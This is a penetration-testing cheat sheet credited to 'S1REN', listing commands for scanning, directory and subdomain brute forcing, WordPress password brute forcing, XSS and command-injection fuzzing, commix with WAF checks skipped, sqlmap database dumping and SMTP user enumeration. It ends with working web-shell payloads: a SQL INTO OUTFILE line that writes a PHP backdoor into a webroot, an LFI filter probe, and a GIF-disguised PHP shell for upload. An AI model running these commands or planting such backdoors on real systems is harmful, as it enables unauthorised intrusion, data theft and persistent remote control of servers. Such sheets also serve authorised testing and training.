Commands
This whole sheet is taken from "S1REN"
===============================================
====nmap====
nmap -sT -sV -p- -T4 $IP > scan1
nmap -p- --script=vuln $IP > scan2
###HTTP-Methods
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
===============================================
===WPScan & SSL
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
===WPScan Brute Forcing:
wpscan --url $URL --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt
===============================================
===Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1
===============================================
===dns_recon
dnsrecon -d yourdomain.com
===============================================
===gobuster directory
gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30
===gobuster files
gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30
===gobuster for SubDomain brute forcing:
gobuster dns -d domain.org -w /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
"just make sure any DNS name you find resolves to an in-scope address before you test it"
===============================================
===Extract IPs from a text file.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt
===============================================
===wfuzz XSS Fuzzing===
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/XSS.txt "$URL"
===wfuzz
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/command-injection.txt -d "doi=FUZZ" "$URL"
===wfuzz html_escape
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt "$URL"
===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "PARAM=value" "$URL"
===Fuzz Directories:
wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"
===Fuzz Files:
wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"
===Fuzz Large Words:
wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"
===Fuzz Users:
wfuzz -c -z file,/opt/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL"
===============================================
===Command injection with commix (forced SSL, WAF detection skipped, random user agent)
commix --url "https://sepermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent
===============================================
===SQL-Map
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump
/seclists/Fuzzing/alphanum-case.txt
===============================================
===Social Recon
theharvester -d domain.org -l 500 -b google
===============================================
===Nmap HTTP-methods:
nmap -p80 --script=http-methods $IP --script-args http-methods.url-path='/directory/goes/here'
===============================================
===smtp USER ENUM
smtp-user-enum -M VRFY -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
===============================================
===Command Execution Verification - [Ping check]
tcpdump -i eth0 -c 5 icmp
===
#Check Network
netdiscover -r 0.0.0.0/24
===
#INTO OUTFILE D00R
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/WEBROOT/backdoor.php";
===
LFI?
#PHP Filter Check
php://filter/convert.base64-encode/resource=
===
UPLOAD IMAGE?
GIF89a1
<?php system($_POST["cmd"]); ?>